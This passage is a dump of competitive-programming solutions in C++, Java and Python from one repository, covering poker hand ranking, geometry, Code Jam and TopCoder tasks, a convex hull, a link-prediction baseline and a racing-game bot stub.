sets.pb({k, v});\n else if (v == 2)\n pairs.pb({k, v});\n \n sort(all(cards));\n sort(all(pairs));\n fori1(5)\n flash &= cards[i - 1].second == cards[i].second,\n street &= cards[i - 1].first + 1 == cards[i].first;\n //fori(5)\n //cerr << \" \" << cards[i].first << \" \" << cards[i].second;\n //cerr << \"\\n\";\n if (flash && street) {\n combination = 0;\n\t\t\tmxx = {-mx};\n //cerr << \"FLASH\" << \" \" << mx << endl;\n }\n else if (fours.size()) {\n combination = 1;\n mx = fours[0].first;\n\t\t\tmxx = {-mx};\n //cerr << \"CARE\" << \" \" << mx << endl;\n }\n else if (sets.size() && pairs.size()) {\n combination = 2;\n mx = sets[0].first;\n\t\t\tmxx = {-mx};\n //cerr << \"FH\" << \" \" << mx << endl;\n }\n else if (flash) {\n combination = 3;\n\t\t\tROF(i, 4, 0)\n\t\t\t\tmxx.pb(-cards[i].first);\n //cerr << \"FLASH\" << \" \" << mx << endl;\n }\n else if (street) {\n combination = 4;\n\t\t\tmxx = {-mx};\n //cerr << \"STREET\" << \" \" << mx << endl;\n }\n else if (sets.size()) {\n combination = 5;\n mx = sets[0].first;\n\t\t\tmxx = {-mx};\n //cerr << \"SET\" << \" \" << mx << endl;\n }\n else if (pairs.size() == 2) {\n combination = 6;\n mx = pairs[1].first;\n\t\t\tmmx = pairs[0].first;\n\t\t\tmxx = {-mx, -mmx};\n //cerr << \"TWO PAIRS\" << \" \" << mx << endl;\n }\n else if (pairs.size() == 1) {\n combination = 7;\n mx = pairs[0].first;\n\t\t\tmxx = {-mx};\n //cerr << \"PAIR\" << \" \" << mx << endl;\n }\n else {\n combination = 8;\n\t\t\tmxx = {-mx};\n //cerr << \"KIKER\" << \" \" << mx << endl;\n }\n }\n\n bool operator<(const user& other) const\n {\n return tuple(combination, mxx, name) < tuple(other.combination, other.mxx, other.name);\n }\n};\n\nvector<string>split(string&s,string_view d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\n\nvoid run()\n{\n m['H'] = 1;\n m['D'] = 2;\n m['S'] = 3;\n m['C'] = 4;\n v['J'] = 11;\n v['Q'] = 12;\n v['K'] = 13;\n v['A'] = 14;\n string s;\n\n while (true)\n {\n vector<user> users;\n bool eof = false;\n getline(cin, s);\n getline(cin, s);\n vector<string> cards = split(s, \"|\");\n while (true)\n {\n getline(cin, s);\n eof = !getline(cin, s);\n if (eof || s == \"\")\n break;\n user u;\n vector<string> cur = split(s, \"|\");\n u.name = cur[1];\n while (u.name.back() == ' ') u.name.pop_back();\n fori(cur.size())\n if (cur[i] == \" 1 \")\n u.add(cards[i]);\n u.calc();\n users.pb(u);\n }\n\n sort(all(users));\n\n vector<string> winners;\n fori(users.size())\n if (users[i].combination == users[0].combination && users[i].mxx == users[0].mxx)\n winners.pb(users[i].name);\n writeln(winners);\n if (eof) break;\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\" \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4813590347766876, "alphanum_fraction": 0.5122130513191223, "avg_line_length": 30.114286422729492, "blob_id": "b3ab5bb179d166d0f858efedf656987b1ee3067a", "content_id": "755d462d381798cb32715c159132562d43f81a28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5445, "license_type": "no_license", "max_line_length": 165, "num_lines": 175, "path": "/2016/RCC3Qual/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\nint f(int i)\n{\n return (i / 2) * (i / 2 - 1) / 2;\n}\n\nvoid run()\n{\n ints(n, k);\n vector<pii> points = {{1000, 1000}, {1000, 2000}, {2000, 2000}, {2000, 1002}};\n vector<pii> dx = {{-2, 2}, {-2, -2}, {2, -2}, {2, 2}};\n vector<pii> ans;\n int i = 0;\n int j = 0;\n int pot = 0;\n for (; f(i) <= k; ++i)\n {\n j = i % 4;\n ans.pb(points[j]);\n points[j].first += dx[j].first;\n points[j].second += dx[j].second;\n pot += i >= 2 && i % 2 == 0;\n if (f(i) == k)\n break;\n }\n int need = k - f(i - 1);\n if (f(i) == k)\n need = 0;\n if (need)\n {\n if (j == 1) \n {\n if (need > pot / 2)\n ans.pb({points[2].first - (need - pot / 2) * 2 - 1, points[2].second});\n else\n ans.pb({ans.back().first + need * 2 + 1, points[2].second});\n }\n if (j == 3) \n {\n //writeln(\"lol\", need, pot / 2);\n if (need <= pot / 2)\n //writeln(\"lol\", points[3]),\n ans.pb({ans.back().first - need * 2 - 1, ans.back().second});\n else\n ans.pb({points[0].first + (need - pot / 2) * 2 + 1, points[0].second});\n }\n }\n vector<pii> ans2;\n vector<pii> dy = {{2, -2}, {2, 2}, {-2, 2}, {-2, -2}};\n vector<pii> points2;\n int mnx, mny, mxx, mxy;\n mnx = mny = mxx = mxy = 1000;\n for (auto www : ans)\n mnx = min(mnx, www.first),\n mxx = max(mxx, www.first),\n mny = min(mny, www.second),\n mxy = max(mxy, www.second);\n points2.pb({mxx + 2, mny});\n points2.pb({mxx + 2, mxy + 2});\n points2.pb({mnx - 2, mxy + 2});\n points2.pb({mnx - 2, mny - 2});\n for (int q = int(ans.size()) - 1, j = 0; q < n; q++, j++)\n ans2.pb(points2[j % 4]),\n points2[j % 4].first += dy[j % 4].first,\n points2[j % 4].second += dy[j % 4].second;\n reverse(whole(ans2));\n if (ans2.size())\n writeln(ans2);\n writeln(ans);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n ints(t);\n fori(t)\n run();\n#ifndef ONLINE_JUDGE\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.4608859419822693, "alphanum_fraction": 0.47596606612205505, "avg_line_length": 24.878047943115234, "blob_id": "d93fc9400c8a59a99732f4bce6848f9609bd9405", "content_id": "a2310f7d12dc6d92fddf68ca9140bf5132851fe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1061, "license_type": "no_license", "max_line_length": 58, "num_lines": 41, "path": "/TopCoder/TC641/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n\n#define fst first\n#define cnd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\nusing namespace std;\n\n#define method string shuffle(vector <int> a)\n\n#define classname ShufflingCardsDiv2\n\nclass classname\n{\n public :\n method\n {\n int n = a.size();\n vi x, y;\n fori(n)\n (i % 2 ? y : x).pb(a[i]);\n int c = n / 2;\n int N = (c + 1) / 2;\n int count = 0;\n fori(x.size())\n if (x[i] <= c)\n count++;\n return count == N ? \"Possible\" : \"Impossible\";\n }\n};\n" }, { "alpha_fraction": 0.521192729473114, "alphanum_fraction": 0.5399211645126343, "avg_line_length": 35.890907287597656, "blob_id": "de07a347f9088af39578f1ae177fb4f2ac4da6f5", "content_id": "eadad59d2a76866173eaf52cd6e7b4065b29be4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4058, "license_type": "no_license", "max_line_length": 163, "num_lines": 110, "path": "/2018/gcj1b/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n \nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T a);ttti void priws(T a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H h,T...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n\n//binSearch\n//x -> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps)\n{\n T m;\n while (fabs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n//Igorjan\n//}}}\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nint run()\n{\n ints(n);\n vector<pii> children(n);\n vector<int> curr(n);\n readln(children, curr);\n return -binSearch(-1000000000, 0, [&](int m) {\n vector<int> deleted(curr);\n\t\t//vector<bool> used(n, false);\n function<bool(int, int, int)> dfs = [&](int u, int count, int it)\n {\n if (it >= 10000) return false;\n //cerr << \"getting \" << count << \" of \" << (u + 1) << \"\\n\";\n //if (used[u] && deleted[u] == 0) return false;\n int temp = deleted[u];\n deleted[u] = max(0, temp - count);\n //used[u] = true;\n if (temp >= count) return true;\n return dfs(children[u].first - 1, count - temp, it + 1) && dfs(children[u].second - 1, count - temp, it + 1); \n };\n return dfs(0, -m, 0);\n }, 1);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n {\n cout << \"Case #\" << (i + 1) << \": \" << run();\n if (i != t - 1) cout << \"\\n\";\n }\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.40732264518737793, "alphanum_fraction": 0.4118993282318115, "avg_line_length": 35.41666793823242, "blob_id": "efa483568081adafa5d2f92028e8a7cef6ada77b", "content_id": "2408cbab34cd1de7c30db765cfd6722e9a682323", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 99, "num_lines": 12, "path": "/CodeForce/0411/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n[a, b] = map(int, raw_input().split())\n[c, d] = map(int, raw_input().split())\n[A, B] = map(int, raw_input().split())\n[C, D] = map(int, raw_input().split())\nif (((a > max(B, D)) & (d > max(A, C))) | ((c > max(B, D)) & (b > max(A, C)))):\n print \"Team 1\"\nelse:\n if ((((A > b) & (D > c)) | ((C > b) & (B > c))) & (((A > d) & (D > a)) | ((C > d) & (B > a)))):\n print \"Team 2\"\n else:\n print \"Draw\"\n" }, { "alpha_fraction": 0.4159553647041321, "alphanum_fraction": 0.4215364456176758, "avg_line_length": 22.06818199157715, "blob_id": "01d71d20d3cdb5c9d0e455c40d36fc8f9f6021df", "content_id": "0d141de426e0eef2448305e5b6393cf2da107226", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3046, "license_type": "no_license", "max_line_length": 103, "num_lines": 132, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.15/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nimport java.io.*;\nimport java.util.*;\n\npublic class D {\n final static String task = \"auxiliary\";\n\n class Point {\n int x, y;\n\n Point(int x, int y) {\n this.x = x;\n this.y = y;\n\n }\n\n @Override\n public boolean equals(Object o) {\n Point p = (Point) o;\n return x == p.x && y == p.y;\n }\n\n @Override\n public int hashCode() {\n return x ^ y;\n }\n\n }\n\n ArrayList<Point> h = new ArrayList<Point>(4096);\n ArrayList<Point> points = new ArrayList<Point>(4096);\n\n void QH(Point a, Point b) {\n Point q = null;\n int max = 0;\n for (Point c : points) {\n int dist = (c.x - a.x) * (b.y - a.y) - (c.y - a.y) * (b.x - a.x);\n\n if (dist > max) {\n q = c;\n max = dist;\n }\n }\n if (q != null) {\n h.add(q);\n QH(a, q);\n QH(q, b);\n }\n }\n\n void run() {\n int n = nextInt();\n Set<Point> hs = new HashSet<Point>(n);\n for (int i = 0; i < n; i++) {\n hs.add(new Point(nextInt(), nextInt()));\n }\n\n for (Point p : hs) {\n points.add(p);\n }\n\n if (points.size() == 1) {\n out.println(0.0);\n return;\n }\n Point a = points.get(0);\n Point b = points.get(1);\n if (points.size() == 2) {\n out.println(Math.sqrt((double) ((b.x - a.x) * (b.x - a.x) + (b.y - a.y) * (b.y - a.y))));\n return;\n }\n\n for (Point p : points) {\n if (p.x < a.x) {\n a = p;\n }\n if (p.x > b.x) {\n b = p;\n }\n }\n h.add(a);\n h.add(b);\n QH(a, b);\n QH(b, a);\n\n double ans = 0;\n for (Point u : h) {\n for (Point v : h) {\n double d = Math.sqrt((double) ((v.x - u.x) * (v.x - u.x) + (v.y - u.y) * (v.y - u.y)));\n if (d > ans) {\n ans = d;\n }\n }\n }\n out.println(ans);\n\n }\n\n int nextInt() {\n return Integer.parseInt(next());\n }\n\n long nextLong() {\n return Long.parseLong(next());\n }\n\n String next() {\n while (stringTokenizer == null || !stringTokenizer.hasMoreTokens()) {\n stringTokenizer = new StringTokenizer(nextLine());\n }\n return stringTokenizer.nextToken();\n }\n\n String nextLine() {\n try {\n return bufferedReader.readLine();\n } catch (IOException err) {\n return null;\n }\n }\n\n static BufferedReader bufferedReader;\n static StringTokenizer stringTokenizer;\n static PrintWriter out;\n\n public static void main(String[] args) throws IOException {\n bufferedReader = new BufferedReader(new InputStreamReader(System.in));\n out = new PrintWriter(System.out);\n new D().run();\n out.close();\n bufferedReader.close();\n }\n}\n" }, { "alpha_fraction": 0.3578219413757324, "alphanum_fraction": 0.3906655013561249, "avg_line_length": 25.295454025268555, "blob_id": "9fefe55d71d680ae01f508d6bb19c19bc7dfcfa3", "content_id": "d5ca393ef6bf181ca8cb46d243bd7c7e36abe54d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1157, "license_type": "no_license", "max_line_length": 61, "num_lines": 44, "path": "/2018/deadline24/B/formatAns.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport re\n\nlines = []\n\ndef printAns():\n cc = 0\n for i in range(len(lines)):\n lines[i] = list(map(int, lines[i].split()))\n cc = max(cc, max(lines[i]) // 100)\n ans = [[(-1, -1) for j in range(100)] for i in range(cc)]\n for i in range(len(lines)):\n for j in range(len(lines[i])):\n if (lines[i][j] < 0):\n lines[i][j] *= -1\n pipe = lines[i][j] // 100 - 1\n index = lines[i][j] % 100\n ans[pipe][index] = (i, j)\n\n print(cc)\n for i in range(cc):\n sss = ''\n for j in range(len(ans[i])):\n if ans[i][j + 1] == (-1, -1):\n break\n if ans[i][j][0] + 1 == ans[i][j + 1][0]:\n sss += 'E'\n if ans[i][j][0] - 1 == ans[i][j + 1][0]:\n sss += 'W'\n if ans[i][j][1] + 1 == ans[i][j + 1][1]:\n sss += 'S'\n if ans[i][j][1] - 1 == ans[i][j + 1][1]:\n sss += 'N'\n print(sss)\n\n\nfor line in sys.stdin:\n if len(re.sub(r'\\s', '', line)) == 0:\n printAns()\n lines = []\n else:\n lines.append(line)\n\nprintAns()\n" }, { "alpha_fraction": 0.6320939064025879, "alphanum_fraction": 0.6771036982536316, "avg_line_length": 21.227272033691406, "blob_id": "ac468f052c8ecabe95ca140188eb0b4a5c8bcb61", "content_id": "e6a4a64876260fddc4173b90f48da3e79ae7c63b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 511, "license_type": "no_license", "max_line_length": 90, "num_lines": 22, "path": "/trains/ai/cpp-cgdk/new/cpp-cgdk/MyStrategy.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"MyStrategy.h\"\r\n\r\n#define PI 3.14159265358979323846\r\n#define _USE_MATH_DEFINES\r\n\r\n#include <cmath>\r\n#include <cstdlib>\r\n\r\nusing namespace model;\r\nusing namespace std;\r\n\r\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\r\n move.setEnginePower(1.0);\r\n move.setThrowProjectile(true);\r\n move.setSpillOil(true);\r\n\r\n if (world.getTick() > game.getInitialFreezeDurationTicks()) {\r\n move.setUseNitro(true);\r\n }\r\n}\r\n\r\nMyStrategy::MyStrategy() { }\r\n" }, { "alpha_fraction": 0.46581631898880005, "alphanum_fraction": 0.4770408272743225, "avg_line_length": 32.7931022644043, "blob_id": "e65fff054a9b526f532a22f095fcde1c4d381064", "content_id": "e6af812fa5bf0d42825186469d4345d4011ca785", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1960, "license_type": "no_license", "max_line_length": 928, "num_lines": 58, "path": "/CodeForce/0316/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <string>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, c;\nvector<bool> b;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a[x] = i;\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n int n, m;\n readln(n, m);\n a.resize(n + 1, 0);\n b.resize(n + 1, false);\n readln(a, n);\n a[0] = 0;\n writeln(a);\n for (int i = 1; i <= n; i++)\n if (!b[i])\n {\n int counter = 0;\n int s = i;\n while (a[s] != 0)\n {\n b[s] = true;\n s = a[s];\n counter++;\n }\n if (counter)\n c.push_back(counter);\n }\n writeln(c);\n return 0;\n}\n" }, { "alpha_fraction": 0.49859419465065, "alphanum_fraction": 0.5238987803459167, "avg_line_length": 25.674999237060547, "blob_id": "acbe08793d0f4caadfa830d0e3e23dd8d5905a77", "content_id": "7d3d6bbbd26625550c5c33daf1e817b881aed28f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2134, "license_type": "no_license", "max_line_length": 82, "num_lines": 80, "path": "/2021/vkcupMl/baseline.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\nimport csv\nfrom tqdm import tqdm\n\ntrainFile = '../SUBMIT/big.csv'\n\nfriends = {}\n\ndef addFriends(u, v, t):\n if not u in friends:\n friends[u] = {}\n friends[u][v] = t\n\nwith open(trainFile, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n for row in tqdm(reader, total = 17414510):\n u = int(row['u'])\n v = int(row['v'])\n t = [int(row['t']), int(row['h'])]\n addFriends(u, v, t)\n addFriends(v, u, t)\n # if len(friends) > 20000:\n # break\n\nfriendsCount = []\nfor u, fs in friends.items():\n if u % 2 == 1:\n friendsCount.append([len(fs), u])\nfriendsCount.sort(reverse = True)\n\ndef log(x):\n return math.log(max(2, x))\n\ndef getAA(sz, uw, vw):\n return log(100 - uw[0]) * log(100 - vw[0]) * log(uw[1]) * log(vw[1]) / log(sz)\n\npossible = {}\n\ndef add(u, v, value):\n if value == 0: return\n if not u in possible:\n possible[u] = {}\n if not v in possible[u]:\n possible[u][v] = 0\n possible[u][v] += value\n\nfor w, wsFriends in tqdm(friends.items(), total = len(friends)):\n l = len(wsFriends)\n for u, uw in wsFriends.items():\n if u % 8 != 1: continue\n if (100 - uw[0]) * uw[1] / l < 2.9: continue\n for v, vw in wsFriends.items():\n if v % 2 == 0 or v <= u or v in friends[u]: continue\n if (100 - vw[0]) * vw[1] / l < 2.9: continue\n add(u, v, getAA(l, uw, vw))\n\nprint('Predictions done')\nanswers = []\nfor u, variants in tqdm(possible.items(), total = len(possible)):\n pos = []\n for v, value in variants.items():\n pos.append((value, v))\n\n if len(pos) > 0:\n pos.sort(reverse = True)\n # for (count, v) in friendsCount:\n # if len(pos) < 10:\n # if v > u:\n # pos.append((count, v))\n # else:\n # break\n\n answers.append((u, ','.join(map(lambda p: str(p[1]), pos[:10]))))\n\nanswers.sort()\nprint('ANSWERS:', len(answers))\nwith open('submit.txt', 'w') as submit:\n for row in tqdm(answers, total = len(answers)):\n submit.write(f'{row[0]}: {row[1]}\\n')\nprint('DONE');\n" }, { "alpha_fraction": 0.5319865345954895, "alphanum_fraction": 0.5392255783081055, "avg_line_length": 27.01886749267578, "blob_id": "b8baae5e4f88e4576c7d44937a30311d784269fe", "content_id": "e7bc216383a62e455bc74ddcacffea4c87401388", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5940, "license_type": "no_license", "max_line_length": 539, "num_lines": 212, "path": "/2014/gcj2014_1B/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n#define FILENAME \"input\"\n#define INF 1000000007\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void readln(Head& head, Tail&... tail);\nvoid writeln(){printf(\"\\n\");}void readln(){}\nstruct graph{vector<vector<int>> edges;int n;graph(int);graph(int, int);graph();void createGraph(int);void add_edge(int, int);void add_or_edge(int, int);void writelnMatrix();void writeln();};\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nint n, m;\nstring ans;\nvector< vi > edges;\nvector< string > s;\nvector< bool > used;\n\nvoid readInput()\n{\n ans = \"\";\n edges.clear();\n s.clear();\n used.clear();\n readln(n, m);\n s.resize(n);\n edges.resize(n);\n used.resize(n);\n readln(s);\n int x, y;\n fori(m)\n readln(x, y),\n edges[--x].pb(--y),\n edges[y].pb(x);\n}\n\nvoid writeOutput()\n{\n writeln(ans);\n}\n\nvoid dfs(int u, vector<bool>&used)\n{\n used[u] = true;\n fori(edges[u].size())\n if (!used[edges[u][i]])\n dfs(edges[u][i], used);\n}\n\nbool debug = true;\nbool ckech(stack<int>st, vector<bool> used)\n{\n// if (st.size())\n // writeln(st.top());\n while (st.size())\n dfs(st.top(), used),\n st.pop();\n if (!debug)\n writeln(used);\n fori(n)\n if(!used[i])\n return false;\n return true;\n}\n\nvoid ff(){};\nstring dij(stack<int> path, int beg)\n{\n int start = beg;\n debug ? ff() : writeln(\"started algo at\", start + 1);\n\tstring qwre = \"\";\n used[start] = true;\n\tset<pair<string, 